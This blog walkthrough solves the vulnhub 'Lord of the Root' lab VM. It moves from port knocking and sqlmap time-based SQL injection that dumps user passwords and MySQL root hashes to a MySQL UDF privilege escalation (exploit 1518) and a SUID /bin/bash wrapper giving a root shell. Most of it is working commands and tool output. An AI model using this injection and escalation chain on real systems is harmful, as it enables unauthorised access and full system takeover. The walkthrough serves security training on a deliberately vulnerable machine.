The Return of the King to become the lord of the R00t

This post is a walk-through for a VM “Lord of the Root” from vulnhub. The interesting thing about this post is that along with the solution, this post will also focus on different approaches I tried and the hindrances I faced while trying those approaches. So, let the hacking begin!!!!

I used Kali VM box as attacker with IP address 192.168.56.102. Vulnerable VM will be assigned IP address dynamically. The first and foremost step was to find out IP address of the vulnerable machine.  Run netdiscover with -r option and give the IP range, it will discover all the host which are up. Upon doing so I came to know that target’s IP address was 192.168.56.101. Now what? Off course scan that target for open ports and services. One important point to note over here is that before scanning any system it is a good practice to check if the ping is enabled or disabled on the given system, by knowing this tiny yet valueable information one can construct his nmap query accordingly for accurate results. So, the ping was disabled on the target system so I fired following query

root@kali:~# nmap -sV -Pn 192.168.56.101

Starting Nmap 7.01 ( https://nmap.org ) at 2016-11-16 21:57 IST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.00075s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
MAC Address: 08:00:27:6C:CF:6B (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.46 seconds

As you see in the output, only SSH port was open running OpenSSH 6.6.1p1 service. The first thing I tried was using hydra to brute force the SSH user name and password, but there was no luck in that. The following message was the hint when I tried connecting to the SSH service.

ssh root@192.168.56.101

.____ _____________________________
 | | \_____ \__ ___/\______ \
 | | / | \| | | _/
 | |___/ | \ | | | \
 |_______ \_______ /____| |____|_ /
 \/ \/ \/
 ____ __. __ ___________ .__ .___ ___________ ___________ __
| |/ _| ____ ____ ____ | | __ \_ _____/______|__| ____ ____ __| _/ \__ ___/___ \_ _____/ _____/ |_ ___________
| < / \ / _ \_/ ___\| |/ / | __) \_ __ \ |/ __ \ / \ / __ | | | / _ \ | __)_ / \ __\/ __ \_ __ \
| | \| | ( <_> ) \___| < | \ | | \/ \ ___/| | \/ /_/ | | |( <_> ) | \ | \ | \ ___/| | \/
|____|__ \___| /\____/ \___ >__|_ \ \___ / |__| |__|\___ >___| /\____ | |____| \____/ /_______ /___| /__| \___ >__|
 \/ \/ \/ \/ \/ \/ \/ \/ \/ \/ \/
Easy as 1,2,3
root@192.168.56.101's password:

I tried googling that message against SSH for example: SSH 1,2,3, SSH friend, SSH Knock. Upon searching the last term, I came across the concept known as port knocking. Upon learning the concept, I tried following command to port knock the system

nmap -sV -Pn -r 192.168.56.101 -p 1,2,3

Starting Nmap 7.01 ( https://nmap.org ) at 2016-11-16 22:17 IST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.00051s latency).
PORT STATE SERVICE VERSION
1/tcp filtered tcpmux
2/tcp filtered compressnet
3/tcp filtered compressnet
MAC Address: 08:00:27:6C:CF:6B (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.26 seconds

Note: -r –> Scan ports consecutively don’t randomize

Once again nmap scan was used to find out if any other ports were opened after port knocking.

root@kali:~# nmap -sV -Pn 192.168.56.101 -p1-65535

Starting Nmap 7.01 ( https://nmap.org ) at 2016-11-16 23:27 IST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.00061s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
1337/tcp open http Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 08:00:27:6C:CF:6B (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.34 seconds

Note :
-sV –> probe open ports to determine service version info.
-Pn –> treat all host as online or disable ping.

As we see in the output port 1337 is open. I tried visiting that port via browser and stumbled upon following web page. Tried looking at the source but there wasn’t anything special.

screenshot-from-2017-01-26-23-16-24

Upon doing quick scan with dir buster on https://192.168.56.101:1337/, I found the image directory which was accessible on the server. Image directory had following two additional images along with the above images.


Since i wanted to view the source code of an HTML page i tired changing each of their extension from .jpg  to .html and surprisingly all of them directed me to only one HTML page.

screenshot-from-2017-01-26-23-46-44

Upon looking at the source code I came across base64 string

THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh

I tried decoding it. The result was another string. Upon decoding the second string there was a .php address. Screen shot shown below  CHANGE

root@kali:~# echo "THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh" | base64 -d
Lzk3ODM0NTIxMC9pbmRleC5waHA= Closer!

root@kali:~# echo "Lzk3ODM0NTIxMC9pbmRleC5waHA= Closer!" | base64 -d
/978345210/index.phpbase64: invalid input

I entered the above address in my web browser as follows http://192.168.56.101:1337/ /978345210/index.php and viola! I was at the gate of Mordor.

mordor

Now what.? off course I had to find our way out by exploiting the this login page and only possible solution was via SQL injection (that’s the only way I know as of now :P). So I tried to use SQLMap. The first step was to determine if there is any SQL injection present here. If yes, which is that parameter from where we can inject our payload. Once that is done the other part was to enumerate the databases present (if any ) down under. So here was the command which I used.

root@kali:~/Downloads# sqlmap -o -u "http://192.168.56.101:1337/978345210/index.php" --level 5 --risk 3 --forms --dbs
 ___
 __H__
 ___ ___[,]_____ ___ ___ {1.0.12#stable}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
 |_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 02:10:40

[02:10:40] [INFO] testing connection to the target URL
[02:10:40] [INFO] heuristics detected web page charset 'ascii'
[02:10:40] [INFO] searching for forms
[#1] form:
POST http://192.168.56.101:1337/978345210/index.php
POST data: username=&password=&submit=%20Login%20
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: username=&password=&submit=%20Login%20] (Warning: blank fields detected): 
do you want to fill blank fields with random values? [Y/n] Y
it appears that provided value for POST parameter 'submit' has boundaries. Do you want to inject inside? (' Login* ') [y/N] N
[02:11:00] [INFO] using '/root/.sqlmap/output/results-12122016_0211am.csv' as the CSV results file in multiple targets mode
[02:11:00] [INFO] heuristics detected web page charset 'ascii'
[02:11:00] [INFO] testing if the target URL is stable
[02:11:01] [INFO] target URL is stable
[02:17:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[02:18:01] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[02:18:04] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (comment)'
Parameter: password (POST)
 Type: AND/OR time-based blind
 Title: MySQL >= 5.0.12 AND time-based blind
 Payload: username=bczG&password='||(SELECT 'LJkm' FROM DUAL WHERE 1175=1175 AND SLEEP(5))||'&submit= Login
---
do you want to exploit this SQL injection? [Y/n] Y
[02:50:06] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[02:50:06] [INFO] fetching database names
[02:50:06] [INFO] fetching number of databases
[02:50:06] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done) 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[02:50:46] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
4
[02:50:46] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done) 
[02:51:39] [INFO] adjusting time delay to 1 second due to good response times
information_schema
[02:56:21] [INFO] retrieved: Webapp
[02:58:04] [INFO] retrieved: mysql
[02:59:26] [INFO] retrieved: performance_schema
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] Webapp

[03:04:09] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-12122016_0211am.csv'

[*] shutting down at 03:04:09

So, as we can see there was valuable information given back to us. Importantly: SQL injection is present in the password parameter, under lying database is MySQL and thirdly the database information. As we can see there are 4 databases present on the underlying system. I tired all three of then and found nothing but the fourth one was interesting. So the next obvious step was to determines the tables present in Webapp database. I used following command to determine that

root@kali:~/Downloads# sqlmap -o -u "http://192.168.56.101:1337/978345210/index.php" --forms -D Webapp --tables
 ___
 __H__
 ___ ___["]_____ ___ ___ {1.0.12#stable}
|_ -| . [)] | .'| . |
|___|_ [)]_|_|_|__,| _|
 |_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 05:35:45

[05:35:46] [INFO] testing connection to the target URL
[05:35:46] [INFO] heuristics detected web page charset 'ascii'
[05:35:46] [INFO] searching for forms
[#1] form:
POST http://192.168.56.101:1337/978345210/index.php
POST data: username=&password=&submit=%20Login%20
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: username=&password=&submit=%20Login%20] (Warning: blank fields detected): 
do you want to fill blank fields with random values? [Y/n] Y
it appears that provided value for POST parameter 'submit' has boundaries. Do you want to inject inside? (' Login* ') [y/N] N
[05:36:02] [INFO] resuming back-end DBMS 'mysql' 
[05:36:02] [INFO] using '/root/.sqlmap/output/results-12122016_0536am.csv' as the CSV results file in multiple targets mode
[05:36:02] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
 Type: AND/OR time-based blind
 Title: MySQL >= 5.0.12 AND time-based blind
 Payload: username=bczG&password='||(SELECT 'LJkm' FROM DUAL WHERE 1175=1175 AND SLEEP(5))||'&submit= Login
---
do you want to exploit this SQL injection? [Y/n] Y
[05:36:07] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[05:36:07] [INFO] fetching tables for database: 'Webapp'
[05:36:07] [INFO] fetching number of tables for database 'Webapp'
[05:36:07] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done) 
[05:36:10] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
1
[05:36:59] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done) 
[05:37:51] [INFO] adjusting time delay to 1 second due to good response times
Users
Database: Webapp
[1 table]
+-------+
| Users |
+-------+

[05:38:59] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-12122016_0536am.csv'

[*] shutting down at 05:38:59

Here, a small tip : we can restrict our enumeration to MySQL or any other database once we find out which databse the underlying system is using. For doing so we need to use following option.

--dbms ==DBMS --> force back-end DBMS to this value

So as we can see in the output, there is only one table present in Webapp database. Lets try and find out the columns in that “Users”  table.

root@kali:~/Downloads# sqlmap -o -u "http://192.168.56.101:1337/978345210/index.php" --forms -D Webapp -T Users --columns 
 ___
 __H__
 ___ ___[,]_____ ___ ___ {1.0.12#stable}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
 |_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 05:58:03

[05:58:03] [INFO] testing connection to the target URL
[05:58:04] [INFO] heuristics detected web page charset 'ascii'
[05:58:04] [INFO] searching for forms
[#1] form:
POST http://192.168.56.101:1337/978345210/index.php
POST data: username=&password=&submit=%20Login%20
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: username=&password=&submit=%20Login%20] (Warning: blank fields detected): 
do you want to fill blank fields with random values? [Y/n] Y
it appears that provided value for POST parameter 'submit' has boundaries. Do you want to inject inside? (' Login* ') [y/N] N
[05:58:18] [INFO] resuming back-end DBMS 'mysql' 
[05:58:18] [INFO] using '/root/.sqlmap/output/results-12122016_0558am.csv' as the CSV results file in multiple targets mode
[05:58:18] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
 Type: AND/OR time-based blind
 Title: MySQL >= 5.0.12 AND time-based blind
 Payload: username=bczG&password='||(SELECT 'LJkm' FROM DUAL WHERE 1175=1175 AND SLEEP(5))||'&submit= Login
---
do you want to exploit this SQL injection? [Y/n] Y
[05:58:21] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[05:58:21] [INFO] fetching columns for table 'Users' in database 'Webapp'
[05:58:22] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done) 
[05:58:25] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[06:12:44] [INFO] adjusting time delay to 2 seconds due to good response times
3
[06:12:45] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done) 
[06:13:17] [INFO] adjusting time delay to 1 second due to good response times
id
[06:13:34] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done) 
int(10)
[06:15:40] [INFO] retrieved: username
[06:17:33] [INFO] retrieved: varchar(255)
[06:20:39] [INFO] retrieved: password
[06:22:57] [INFO] retrieved: varchar(255)
Database: Webapp
Table: Users
[3 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| id | int(10) |
| password | varchar(255) |
| username | varchar(255) |
+----------+--------------+

[06:26:03] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-12122016_0558am.csv'

[*] shutting down at 06:26:03

I found three columns in Users table so lets try and dump the content from those columns using following command

root@kali:~/Downloads# sqlmap -o -u "http://192.168.56.101:1337/978345210/index.php" --forms -D Webapp -T Users -C username --dump
 ___
 __H__
 ___ ___[.]_____ ___ ___ {1.0.12#stable}
|_ -| . [)] | .'| . |
|___|_ [)]_|_|_|__,| _|
 |_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 08:34:49

[08:34:49] [INFO] testing connection to the target URL
[08:34:49] [INFO] heuristics detected web page charset 'ascii'
[08:34:50] [INFO] searching for forms
[#1] form:
POST http://192.168.56.101:1337/978345210/index.php
POST data: username=&password=&submit=%20Login%20
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: username=&password=&submit=%20Login%20] (Warning: blank fields detected): 
do you want to fill blank fields with random values? [Y/n] Y
it appears that provided value for POST parameter 'submit' has boundaries. Do you want to inject inside? (' Login* ') [y/N] N
[08:35:19] [INFO] resuming back-end DBMS 'mysql' 
[08:35:19] [INFO] using '/root/.sqlmap/output/results-12122016_0835am.csv' as the CSV results file in multiple targets mode
[08:35:19] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
 Type: AND/OR time-based blind
 Title: MySQL >= 5.0.12 AND time-based blind
 Payload: username=bczG&password='||(SELECT 'LJkm' FROM DUAL WHERE 1175=1175 AND SLEEP(5))||'&submit= Login
---
do you want to exploit this SQL injection? [Y/n] Y
[08:37:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[08:37:58] [INFO] fetching entries of column(s) 'username' for table 'Users' in database 'Webapp'
[08:37:58] [INFO] fetching number of column(s) 'username' entries for table 'Users' in database 'Webapp'
[08:37:58] [INFO] resumed: 5
[08:37:58] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done) 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[10:24:11] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
a
[10:25:01] [INFO] adjusting time delay to 2 seconds due to good response times
ragorn
[10:27:54] [INFO] retrieved: frodo
[10:30:56] [INFO] retrieved: gimli
[10:33:28] [INFO] retrieved: legolas
[10:37:11] [INFO] retrieved: smeagol
[10:40:44] [INFO] analyzing table dump for possible password hashes
Database: Webapp
Table: Users
[5 entries]
+----------+
| username |
+----------+
| aragorn |
| frodo |
| gimli |
| legolas |
| smeagol |
+----------+

[10:40:44] [INFO] table 'Webapp.Users' dumped to CSV file '/root/.sqlmap/output/192.168.56.101/dump/Webapp/Users.csv'
[10:40:44] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-12122016_0835am.csv'

[*] shutting down at 10:40:44

Content from password column:

 root@kali:~/Downloads# sqlmap -o -u "http://192.168.56.101:1337/978345210/index.php" --forms -D Webapp -T Users -C password --dump
 ___
 __H__
 ___ ___[(]_____ ___ ___ {1.0.12#stable}
|_ -| . [.] | .'| . |
|___|_ [.]_|_|_|__,| _|
 |_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 07:29:24

[07:29:24] [INFO] testing connection to the target URL
[07:29:24] [INFO] heuristics detected web page charset 'ascii'
[07:29:24] [INFO] searching for forms
[#1] form:
POST http://192.168.56.101:1337/978345210/index.php
POST data: username=&password=&submit=%20Login%20
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: username=&password=&submit=%20Login%20] (Warning: blank fields detected): 
do you want to fill blank fields with random values? [Y/n] Y
it appears that provided value for POST parameter 'submit' has boundaries. Do you want to inject inside? (' Login* ') [y/N] N
[07:29:41] [INFO] resuming back-end DBMS 'mysql' 
[07:29:41] [INFO] using '/root/.sqlmap/output/results-12122016_0729am.csv' as the CSV results file in multiple targets mode
[07:29:41] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
 Type: AND/OR time-based blind
 Title: MySQL >= 5.0.12 AND time-based blind
 Payload: username=bczG&password='||(SELECT 'LJkm' FROM DUAL WHERE 1175=1175 AND SLEEP(5))||'&submit= Login
---
do you want to exploit this SQL injection? [Y/n] Y
[07:29:44] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[07:29:44] [INFO] fetching entries of column(s) 'password' for table 'Users' in database 'Webapp'
[07:29:44] [INFO] fetching number of column(s) 'password' entries for table 'Users' in database 'Webapp'
[07:29:45] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done) 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[07:52:42] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
5
[07:53:08] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done) 
A
[07:54:25] [INFO] adjusting time delay to 1 second due to good response times
ndMyAxe
[07:56:39] [INFO] retrieved: AndMyBow
[07:59:17] [INFO] retrieved: AndMySword
[08:02:27] [INFO] retrieved: iwilltakethering
[08:06:39] [INFO] retrieved: MyPreciousR00t
[08:10:40] [INFO] analyzing table dump for possible password hashes
Database: Webapp
Table: Users
[5 entries]
+------------------+
| password |
+------------------+
| AndMyAxe |
| AndMyBow |
| AndMySword |
| iwilltakethering |
| MyPreciousR00t |
+------------------+

[08:10:40] [INFO] table 'Webapp.Users' dumped to CSV file '/root/.sqlmap/output/192.168.56.101/dump/Webapp/Users.csv'
[08:10:40] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-12122016_0729am.csv'

[*] shutting down at 08:10:40

Here is the important and arranged output from above dumps.

+----------+    +------------------+
| username |        | password |
+----------+    +------------------+
| aragorn |          | AndMyAxe |
| frodo |            | AndMyBow |
| gimli |            | AndMySword 
| legolas |          | iwilltakethering 
| smeagol |          | MyPreciousR00t |
+----------+    +------------------+

I tried all the user name and password on the Gates of Mordor web page but non of them worked. After some thought on this issue I tried these credentials on SSH service and viola, the last credential worked and i was on the system with smeagol’s privileges.
Now what? the obvious step was to escalate our privileges to root level since that was the ultimate goal.

The first step in linux privileges escalation was of system enumeration, while doing research I came across one excellent blog or rather I would say bible of privilege escalation written by G0tmi1k Basic Linux Privilege Escalation. I quickly googled a script for doing this enumeration since doing all this manually was a hectic process. I came across one nice script which I will be using here, its called linuxprivchecker.py.

I downloaded the script and transferred it to the html folder on my kali machine. Further I used wget command to transfer it to the vulnerable machine. Upon executing this script it gave out some interesting results. The good thing about this script is that along with the important info about this system this script also give out the possible exploit which can be looked and tested upon this system.

[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...

Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!

The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
 - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c

The following exploits are applicable to this kernel version and should be investigated as well
 - Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
 - Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby**
 - CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
 - CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
 - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
 - open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
 - open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c

Finished

Upon visiting the mysql exploit link, I was sure that this exploit is only possible if the mysql is running as root. I tried rechecking the output from LinuxPrivChecker to make sure that mysql is running as the root in order to use this exploit code. Simple trick to do that is as follows.

smeagol@LordOfTheRoot:~/Downloads$ python linuxprivchecker.py > output_linux
smeagol@LordOfTheRoot:~/Downloads$ cat output_linux | grep "mysql"
 -rw------- 1 smeagol smeagol 492 Jan 7 17:28 /home/smeagol/.mysql_history
 mysql:x:116:125:MySQL Server,,,:/nonexistent:/bin/false
 drwxr-s--- 2 mysql adm 4096 Jan 7 17:12 /var/log/mysql
 /etc/mysql/my.cnf:# It has been reported that passwords should be enclosed with ticks/quotes
 libdbd-mysql-perl 4.025-1 Perl5 database interface to the MySQL database
 libmysqlclient18:i386 5.5.44-0ubuntu0.14.04.1 MySQL database client library
 mysql-client-5.5 5.5.44-0ubuntu0.14.04.1 MySQL database client binaries
 mysql-client-core-5.5 5.5.44-0ubuntu0.14.04.1 MySQL database core client binaries
 mysql-common 5.5.44-0ubuntu0.14.04.1 MySQL database common files, e.g. /etc/mysql/my.cnf
 mysql-server 5.5.44-0ubuntu0.14.04.1 MySQL database server (metapackage depending on the latest version)
 mysql-server-5.5 5.5.44-0ubuntu0.14.04.1 MySQL database server binaries and system database setup
 mysql-server-core-5.5 5.5.44-0ubuntu0.14.04.1 MySQL database server binaries
 php5-mysql 5.5.9+dfsg-1ubuntu4.11 MySQL module for php5
 php5-mysqlnd 5.5.9+dfsg-1ubuntu4.11 MySQL module for php5 (Native Driver)
 root 1150 Jan07 0:47 /usr/sbin/mysqld
 root 1150 Jan07 0:47 /usr/sbin/mysqld

Now what we need to get myslq root password in order to use that exploit. Again, I tried using SQLmap to delve dipper into the mysql database for that I used the following command

Root@kali:~# sqlmap -u http://192.168.56.101:1337/978345210/index.php --forms --dbms=MySQL -D mysql -T user -C user,password --dump

Output:

Table: user
[5 entries]
+------------------+-------------------------------------------+
| user | password |
+------------------+-------------------------------------------+
| debian-sys-maint | *A55A9B9049F69BC2768C9284615361DFBD580B34 |
| root | *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F |
| root | *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F |
| root | *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F |
| root | *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F |
+------------------+-------------------------------------------+

[15:22:45] [INFO] table 'mysql.`user`' dumped to CSV file '/root/.sqlmap/output/192.168.56.101/dump/mysql/user.csv'
[15:22:45] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-01082017_0148pm.csv'

[*] shutting down at 15:22:45

Upon using online hash cracker I came to know that password is darkshadow.

Next step was to try out every single stepped explained in 1518.c exploit from exploit db, so I quickly used my shell access to login into MySQL as a root user by using the above password. First i tried compiling the C code.

root@kali $ gcc -g -c 1518.c
root@kali $ gcc -g -shared -W1,-soname,1518.so -o 1518.so 1518.o -lc
mysql> use mysql
Database changed

mysql> insert into mysql_exploit values (load_file('/home/smeagol/1518.so'));
Query OK, 1 row affected (0.00 sec)

mysql> select * from mysql_exploit into dumpfile '/usr/lib/mysql/plugin/1518.so';


mysql> create function do_system returns integer soname '1518.so'


mysql> select * from mysql.func;
+-----------+-----+---------+----------+
| name      | ret | dl      | type     |
+-----------+-----+---------+----------+
| do_system |   2 | 1518.so | function |
+-----------+-----+---------+----------+
1 row in set (0.00 sec)


mysql> select do_system ('id> tmp/out; chown smeagol.smeagol /tmp/out');
+-----------------------------------------------------------+
| do_system ('id> tmp/out; chown smeagol.smeagol /tmp/out') |
+-----------------------------------------------------------+
|                                                         0 |
+-----------------------------------------------------------+

After executing the above command i tried checking out the /tmp/out file using cat command.

root@kali $ cat /tmp/out
uid=0(root) gid=0(root) groups=0(root),1(bin)

Command worked, we executed the command as a root user. but that wasn’t a complete root access so while doing some research i came across one blog which explained the above-mentioned exploit in detail.
I have explained the method to get the permanent root access over the system. The link for the blog can be found here: Blog.

This method follows the same concept but this time it compiles and sets SUID bit on the script which when run gives root shell access. Below is the C code which will be compiled.

# inlcude <stdio.h>
# inlcude <sys/types.h>
#include <unistd.h>
int main (void)
{
setuid (0); setgid(0); system ("/bin/bash"); 
}

Now in MySQL database we compile the code , set the SetUID attribute as root and execute the script.

mysql> select do_system ('gcc -o /home/smeagol/shell /home/smeagol/shell.c');
+------------------------------------------------------------------------+
| do_system ('gcc -o /home/smeagol/shell /home/smeagol/shell.c') |
+------------------------------------------------------------------------+
|                                                                      0 |
+------------------------------------------------------------------------+
1 row in set (1.42 sec)

mysql> select do_system('chmod u+s /home/smeagol/shell');
+------------------------------------------------+
| do_system('chmod u+s /home/smeagol/shell') |
+------------------------------------------------+
|                                              0 |
+------------------------------------------------+
1 row in set (0.00 sec)

mysql> exit
Bye
smeagol@LordOfTheRoot:~$ ./shell 
root@LordOfTheRoot:~#

There you go, we got the root shell. I quickly searched for the flag which was there in the /root folder and here is what it had to say.

root@LordOfTheRoot:~# cat /root/Flag.txt 
“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.”
– Gandalf

Takeaways:

  • Passion Patience and hard-work
  • Never give up.
  • Keep solving Vulnerable VMs 😛

Thanks a lot KookSec and Vulnhub for this VM!!

Advertisements

Author: Gray Wolf

Son, Brother and Cyber Security Enthusiast...

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s